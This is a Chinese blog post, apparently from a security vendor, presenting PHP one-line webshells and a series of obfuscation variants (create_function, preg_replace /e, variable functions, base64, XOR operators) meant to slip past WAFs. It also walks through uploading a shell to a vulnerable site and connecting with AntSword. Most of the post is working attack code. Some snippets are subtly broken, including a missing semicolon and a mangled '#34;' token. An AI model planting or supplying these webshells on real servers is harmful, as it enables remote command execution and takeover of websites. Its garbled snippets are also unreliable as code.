铭说 | 一句话木马的多种变形方式
xsobi 2025-04-29 06:14 8 浏览
今天来和大家聊一聊,一句话木马的多种变形方式。
经常有客户的网站碰到被上传小马和大马,这里的“马”是木马的意思,可不是真实的马。
通常,攻击者利用文件上传漏洞,上传一个可执行并且能被解析的脚本文件,通过这个脚本来获得服务器端执行命令的能力,也就是我们经常听到的WebShell,而这个脚本文件就是我们常说的大马和小马。
1、都有些什么“马”?
- 小马
体积小,功能少,优点在于不易被发现,功能单一,常作为上传大马的跳板。
- 大马
体积大,功能强大,但是易被发现。
- 一句话木马
在小马和大马之外衍生出的另一种木马,只需短短一行代码,再结合WebShell工具(如菜刀、蚁剑、冰蝎等等)就能做到与大马能力相当的功能(执行命令行、文件上传、文件下载等功能)。
随着一句话木马的滥用,普通的一句话木马都已经逃不过waf的检测了,为了逃避waf的检测,一句话木马开始了他的变形之旅。
2、一句话木马的变形之路
环境介绍:
解析语言:php(版本:5.6.27)
WebShell工具:蚁剑
【最初的一句话】
制作一句话:
<?php @eval($_POST['juminfo']);?>
<?php @assert($_POST['juminfo']);?>
找到具有上传漏洞的站点,将该脚本上传,并访问。发现是一片空白,可以说明该木马能被解析。
使用蚁剑连接。
连接成功,获得WebShell。
这样的木马虽然简单,但是他明显的关键字很容易就被各类waf检测到。
为了绕过waf,我们的思路可以更宽一些,主要的思路有大小写混淆,字符编码,分散特征码等。
【create_function函数】
脚本内容:
<?php
$fun = create_function('',$_POST['juminfo']);
$fun();
?>
把用户传递的数据生成一个函数fun(),然后再执行fun()。
【create_function函数】
脚本内容:
<?php
@call_user_func(assert,$_POST['juminfo']);
?>
call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。
【preg_replace函数】
脚本内容:
<?php
@preg_replace("/abcde/e", $_POST['juminfo'], "abcdefg");
?>
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
【file_put_contents函数】
脚本内容:
<?php
$test='<?php $a=$_POST["juminfo"];assert($a); ?>';
file_put_contents("hello.php", $test);
?>
使用方法:先用浏览器访问,生成新的文件"hello.php",再连接"hello.php"。
利用函数生成文件,第一个参数是文件名,第二个参数是文件的内容。
【PHP变量函数】
脚本内容:
<?php
$a = "assert";
$a(@$_POST['juminfo']);
?>
第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。
【PHP可变变量】
脚本内容:
<?php
$bb="assert";
$a="bb";
$a(@$_POST['juminfo']);
?>
通过上一个语句进行的多一层变化:$a = $($a) = $ (‘bb’) = $bb = "assert"
【str_replace函数】
脚本内容:
<?php
$a=str_replace("juminfo", "", "assjuminfoert");
$a(@$_POST['juminfo']);
?>
在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"juminfo"。
【base64_decode函数】
脚本内容:
<?php
$a=base64_decode("YXNzZXJ0")
$a($_POST['juminfo']);
?>
这里是base64解密函数,"YXNzZXJ0"是assert的base64加密。
【"."操作符】
脚本内容:
<?php
$a="as"."s";
$b="er"."t";
$c=$a.$b;
$c($_POST['juminfo']);
?>
【运算符变形】
脚本内容:
<?php
@$_++;
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
$___=("#34;^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
${$__}[!$_](${$___}[$_]);
?>
当我第一次看到这个脚本的时候,一头雾水,这是什么东西?
后来用echo打印出三个变量$_++、$__、$___可以看到他们的值分别为1、_GET、_POST,放入最后一条语句中刚好组成一个两层的一句话木马。
<?php $_GET[0]($_POST[1])?>
只要我们将0赋值为assert就可以构成经典的一句话<?php assert($_POST[1])?>,密码是1。
3、总结
一句话的混淆方式还有很多很多,基于以上的变形思路还能够衍生出无数新的变种木马,为了更好地防止“被放马”的事件发生,我们应该及时对使用的安全产品进行更新,才能让“马”无处可走。
免责声明:本文提及的技术仅可用于私人学习测试等合法场景中,任何不当利用该技术所造成的刑事、民事责任均与本文作者无关。
相关推荐
- 推荐几款 Webshell 查杀工具 PHP、Python、JSP、ASP、JS、HTML、Apk
-
Webshell会严重威胁到网站的安全性,webshell木马可以任意修改网站文件内容,查看系统环境、执行脚本、提权等等,甚至可以严重威胁数据库的安全。作为一名站长,定期检查网站文件安全是必不可少的...
- Visual Studio Code安装C#开发工具包并编写ASP.NET Core Web应用
-
前言前段时间微软发布了适用于VSCode的C#开发工具包(注意目前该包还属于预发布状态但是可以正常使用),因为之前看过网上的一些使用VSCode搭建.NETCore环境的教程看着还挺复杂的就一...
- DevExpress Demo示例展示:ASP.NET MVC报表无与伦比的设计时体验
-
DevExpressASP.NETMVCReporting原生集成DevExpressASP.NETMVC扩展以及无与伦比的设计时生产力。下面几个典型示例展示了它强大的设计时功能,Web报...
- 在ubuntu下新建asp.net core项目(ubuntu创建swap)
-
本文一步步讲述在ubuntu下用visualstudiocode创建asp.netcore项目的过程。step1:环境操作系统:virtualbox下安装的lubuntu。请不要开启“硬件...
- Asp.net常用方法及request和response-a
-
asp.net教程asp.net常用方法:1、Request.UrlReferrer请求的来源,可以根据这个判断从百度搜的哪个关键词、防下载盗链、防图片盗链,可以伪造(比如迅雷)。(使用全局一般处理...
- 「B/S端开发」DevExtreme初级入门教程 - ASP.NET MVC 5控件简介
-
欢迎阅读了解DevExtremeASP.NETMVC5控件有关的文档!DevExtremeCompleteSubscription官方最新版免费下载试用,历史版本下载,在线文档和帮助文件下...
- 微软跨平台开源.Net Core与ASP.Net已可用于生产环境
-
周三在举行Connect2015的同时,微软升级了.NetCore和ASP.Net,开发者可以开始在生产环境使用微软开源的.NetCore跨平台框架和ASP.NetWeb平台。微软发布了.Net...
- 用ASP生成Excel数据三种方法(asp生成word)
-
可能是将一个html表格变成MicrosoftExcel格式的最快方法。ContentType属性通知浏览器数据要被格式化为何种格式,在这里我们要的格式是MicrosoftExcel。当浏...
- 个人web开发我选Asp.net core,你选谁?PHP?还是JSP?
-
现在很多公司都会选用PHP,JSP来开发,但是现在Asp.netcore已经今非昔比了。今天微软金牌合作伙伴51aspx来分享一些关于.Net的那点事。.Net以前是不开源的,需要收费,有着各种版权...
- 创建第一个ASP.NET Core WebService程序
-
要创建第一个ASP.NETCoreWebService程序,可以按照以下步骤进行:1、安装.NETCoreSDK:首先,确保已在计算机上安装了最新版本的.NETCoreSDK。可以从Mic...
- 网站收录,网站收录方法技巧,网站收录入口(图文教程)
-
网站收录,是网站参与排名的前提,搜索引擎会先收录网站到自己的索引库里,然后根据算法计算出排名结果。也就是说,搜索引擎不收录的网站没有任何获得排名的机会。所以,我们需要关注自身网站收录情况。网站收录指的...
- 黑客通过Kali Linux设置一个钓鱼网站原来这么简单
-
一、背景介绍钓鱼网站是指欺骗用户的虚假网站。“钓鱼网站”的页面与真实网站界面基本一致,欺骗消费者或者窃取访问者提交的账号和密码信息。钓鱼网站一般只有一个或几个页面,和真实网站差别细微。钓鱼网站是互联网...
- 快速将网站从HTTP升级到HTTPS教程
-
在当今社会,每个人都离不开互联网,网络的安全性变得越来越重要,将网站从HTTP协议升级到HTTPS协议已成为保护用户数据安全和提高网站信任度的必要步骤,HTTPS不仅加密了用户与服务器之间的数据传输,...
- 从学习硬件知识到选电脑配置再到电脑组装教程及系统安装-导航篇
-
对于准备想要装机的小白来说,可能会在网上找各种关于硬件知识文章,或者直接找适合自己的组装电脑配置清单,电脑组装教程以及系统安装教程等,但其实装机之家网站上有着大量关于这类文章,就是由于文章过多,导致了...
- 10个顶级的office学习网站,5天让你菜鸟变大神,月薪过万不用愁
-
现在有很多小伙伴在工作的时候,都需要用到各种office办公软件。但是对于很多职场小白来说,想要很好的掌握office真的不是一件简单的事情。别担心,今天小编将推荐10个优质的office学习网站给大...
- 一周热门
- 最近发表
-
- 推荐几款 Webshell 查杀工具 PHP、Python、JSP、ASP、JS、HTML、Apk
- Visual Studio Code安装C#开发工具包并编写ASP.NET Core Web应用
- DevExpress Demo示例展示:ASP.NET MVC报表无与伦比的设计时体验
- 在ubuntu下新建asp.net core项目(ubuntu创建swap)
- Asp.net常用方法及request和response-a
- 「B/S端开发」DevExtreme初级入门教程 - ASP.NET MVC 5控件简介
- 微软跨平台开源.Net Core与ASP.Net已可用于生产环境
- 用ASP生成Excel数据三种方法(asp生成word)
- 个人web开发我选Asp.net core,你选谁?PHP?还是JSP?
- 创建第一个ASP.NET Core WebService程序
- 标签列表
-
- grid 设置 (58)
- 移位运算 (48)
- not specified (45)
- 导航栏 (58)
- context xml (46)
- scroll (43)
- dedecms模版 (53)
- c 视频教程下载 (33)
- listview排序 (33)
- characterencodingfilter (33)
- getmonth (34)
- label换行 (33)
- android studio 3 0 (34)
- html转js (35)
- 索引的作用 (33)
- checkedlistbox (34)
- xmlhttp (35)
- mysql更改密码 (34)
- 权限777 (33)
- htmlposition (33)
- 学校网站模板 (34)
- textarea换行 (34)
- 轮播 (34)
- asp net三层架构 (38)
- bash (34)